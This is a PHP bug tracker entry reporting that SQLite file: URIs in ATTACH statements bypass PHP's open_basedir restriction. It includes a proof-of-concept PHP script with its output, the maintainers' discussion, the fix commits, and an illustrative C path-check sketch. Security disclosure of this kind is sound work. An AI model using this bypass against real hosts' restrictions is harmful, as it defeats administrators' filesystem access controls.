Sec Bug #77967 Bypassing open_basedir restrictions via file uris
Submitted: 2019-05-04 10:04 UTC Modified: 2019-05-28 04:36 UTC
From: radimre83 at gmail dot com Assigned:
Status: Closed Package: SQLite related
PHP Version: 7.3.5 OS: Linux
Private report: No CVE-ID: None
 [2019-05-04 10:04 UTC] radimre83 at gmail dot com
Description:
------------
SQLite supports the file: URI handler as part of the DSN string. https://sqlite.org/uri.html

This feature can be abused to bypass the open_basedir restriction configured for PHP.


Test script:
---------------
<?php
file_put_contents("/safe/test.txt", "shall work");
file_put_contents("/unsafe/test.txt", "shall be a warning due to openbasedir");


$db = new SQLite3("/safe/main.db", 0x00000002|0x00000004|0x00000040); // 0x40 is SQLITE_OPEN_URI

chdir("/safe"); // the current working dir must be one of the open basedirs
$db->exec("ATTACH 'file:/unsafe/poc.db' AS sdb;");
$db->exec("CREATE TABLE sdb.t (t TEXT)");
$db->exec("INSERT INTO sdb.t (t) VALUES ('foobar')");
$db->close();


Expected result:
----------------
root@fd7f809a8411:/# /build/php-7.3.5/sapi/cli/php -d open_basedir=/safe /repo-shared/sqlite/sqlite-attach.php

Warning: file_put_contents(): open_basedir restriction in effect. File(/unsafe/test.txt) is not within the allowed path(s): (/safe) in /repo-shared/sqlite/sqlite-attach.php on line 3

Warning: file_put_contents(/unsafe/test.txt): failed to open stream: Operation not permitted in /repo-shared/sqlite/sqlite-attach.php on line 3

Warning: SQLite3::exec(): not authorized in /repo-shared/sqlite/sqlite-attach.php on line 9

Warning: SQLite3::exec(): unknown database sdb in /repo-shared/sqlite/sqlite-attach.php on line 10

Warning: SQLite3::exec(): no such table: sdb.t in /repo-shared/sqlite/sqlite-attach.php on line 11

root@fd7f809a8411:/safe# ls -la /unsafe/
total 16
drwxr-xr-x  2 root root 4096 May  4 09:53 .
drwxr-xr-x 71 root root 4096 May  4 09:46 ..


Actual result:
--------------
root@fd7f809a8411:/# /build/php-7.3.5/sapi/cli/php -d open_basedir=/safe /repo-shared/sqlite/sqlite-attach.php

Warning: file_put_contents(): open_basedir restriction in effect. File(/unsafe/test.txt) is not within the allowed path(s): (/safe) in /repo-shared/sqlite/sqlite-attach.php on line 3

Warning: file_put_contents(/unsafe/test.txt): failed to open stream: Operation not permitted in /repo-shared/sqlite/sqlite-attach.php on line 3

root@fd7f809a8411:/safe# ls -la /unsafe/
total 16
drwxr-xr-x  2 root root 4096 May  4 09:53 .
drwxr-xr-x 71 root root 4096 May  4 09:46 ..
-rw-r--r--  1 root root 8192 May  4 09:53 poc.db



 [2019-05-05 17:34 UTC] radimre83 at gmail dot com
-Type: Bug +Type: Security -Private report: No +Private report: Yes
 [2019-05-05 17:34 UTC] radimre83 at gmail dot com
Changing bug type to Security.
 [2019-05-06 00:46 UTC] stas@php.net
Since it happens inside SQLITE, I do not think PHP can do anything about it.
 [2019-05-06 05:53 UTC] radimre83 at gmail dot com
"Since it happens inside SQLITE, I do not think PHP can do anything about it."

You already have an authorizer callback (sqlite3_set_authorizer) implemented, that calls php_check_open_basedir() with the parameter of the ATTACH statement. It could be improved to pay special attention to the file: prefix.
 [2019-05-06 11:07 UTC] cmb@php.net
Indeed, PHP should either properly check open_basedir in
php_sqlite3_authorizer(), or it should reject file URIs altogether
(they are not supported for SQLite3::open() anyway).
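
An illustration of the check discussed in the comments above, as an added example that is not php-src code and not the committed fix: it reduces an ATTACH argument to the path SQLite would open, following the file: URI rules at https://sqlite.org/uri.html, before comparing it with the allowed directory. The names attach_arg_to_path and attach_allowed are hypothetical, and the comparison is an assumed lexical stand-in (absolute paths only, base directory given without a trailing slash) for a real check that also resolves symlinks.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
/* Hypothetical helper (not a php-src function): turn an ATTACH argument into
 * the filesystem path SQLite would open. Returns 0 on success, -1 to deny. */
static int attach_arg_to_path(const char *arg, char *out, size_t outlen)
{
    size_t n = 0;
    if (strncmp(arg, "file:", 5) != 0) {              /* plain filename */
        if (strlen(arg) >= outlen) return -1;
        strcpy(out, arg);
        return 0;
    }
    arg += 5;
    if (arg[0] == '/' && arg[1] == '/') {             /* file://authority/path */
        const char *slash = strchr(arg + 2, '/');
        size_t alen = slash ? (size_t)(slash - (arg + 2)) : 0;
        if (!slash || (alen != 0 && (alen != 9 || strncmp(arg + 2, "localhost", 9))))
            return -1;                                /* only empty or localhost */
        arg = slash;
    }
    for (; *arg && *arg != '?' && *arg != '#'; arg++) {   /* drop query/fragment */
        char c = *arg;
        if (c == '%') {                               /* percent-decode %HH */
            char hex[3] = { arg[1], arg[1] ? arg[2] : 0, 0 };
            if (!isxdigit((unsigned char)hex[0]) || !isxdigit((unsigned char)hex[1]))
                return -1;
            if ((c = (char)strtol(hex, NULL, 16)) == '\0') return -1;  /* embedded NUL */
            arg += 2;
        }
        if (n + 1 >= outlen) return -1;
        out[n++] = c;
    }
    out[n] = '\0';
    return 0;
}

/* Lexical stand-in for the basedir check: absolute, no "..", under basedir. */
int attach_allowed(const char *arg, const char *basedir)
{
    char path[4096];
    size_t blen = strlen(basedir), plen;
    if (*arg == '\0' || strcmp(arg, ":memory:") == 0) return 1;  /* no named file */
    if (attach_arg_to_path(arg, path, sizeof path) != 0) return 0;
    plen = strlen(path);
    if (path[0] != '/' || strstr(path, "/../")) return 0;
    if (plen >= 3 && strcmp(path + plen - 3, "/..") == 0) return 0;
    return strncmp(path, basedir, blen) == 0 && (path[blen] == '/' || path[blen] == '\0');
}
```

A function like this would be consulted from the authorizer callback for the ATTACH action, denying the statement when it returns 0.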
 [2019-05-08 09:40 UTC] cmb@php.net
According to a recent discussion[1] on the internals mailing list,
this is likely not a security issue though.

[1] <http://news.php.net/php.internals/105606>
 [2019-05-09 05:42 UTC] radimre83 at gmail dot com
I agree with the proposal, open_basedir shall be deprecated and then deco'ed eventually.
Until then, people will keep using it as a security feature, I'm afraid.
 [2019-05-28 04:36 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c34895e837b50213c2bb201c612904342d2bd216
Log: Fix bug #77967 - Bypassing open_basedir restrictions via file uris
 [2019-05-28 04:36 UTC] stas@php.net
-Status: Open +Status: Closed
 [2019-05-28 07:07 UTC] cmb@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=d27b4824e667c5ed3eac9c16496777392eae5b03
Log: Fix bug #77967 - Bypassing open_basedir restrictions via file uris
 